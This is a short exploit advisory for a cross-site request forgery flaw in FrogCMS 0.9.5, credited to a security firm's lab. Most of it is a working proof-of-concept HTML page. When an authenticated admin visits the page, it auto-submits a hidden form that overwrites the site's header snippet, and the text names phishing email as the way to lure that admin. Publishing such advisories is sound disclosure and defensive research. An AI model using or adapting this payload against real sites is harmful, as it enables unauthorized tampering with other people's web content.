# Software      : FrogCMS v0.9.5
# Author        : Jeremiah Talamantes for RedTeam Security
# Date          : June 10, 2010
# OS            : Windows
# Tested on     : XP SP2 EN (Virtual PC)
# Type of vuln  : CSRF

# Description	:
# Lack of security controls in place to prevent Cross Site 
# Request Forgery attacks. The POC below will open a core
# module (snippet) containing HTML that rendered as the
# "header" for each page.
#
# An attacker can trick an authenticated user (email phish) 
# into clicking on a malicious web page (POC) that is 
# designed to overwrite the contents of the default HEADER 
# snippet.

# RedTeam Security / RedTeam Security Labs
# http://www.redteamsecure.com/labs

# POC Code

<html>
<head>
	<title>FrogCMS CSRF</title>
	<script type="text/javascript">
		function myfunc () {
			var frm = document.getElementById("csrf");
			frm.submit();
		}
		window.onload = myfunc;
	</script>
</head>
<body>
	<!-- Update the form action parameter to match the victim FrogCMS URL -->
	<form id="csrf" action="http://localhost/frogcms/admin/?/snippet/edit/1" method="post">
		<input type="hidden" id="snippet_name" name="snippet[name]" value="FrogCMS CSRF" />
		<input type="hidden" id="snippet_filter_id" name="snippet[filter_id]" value="" />
		<input type="hidden" id="snippet_content" name="snippet[content]" value="FrogCMS CSRF" />
	</form>
</body>
</html>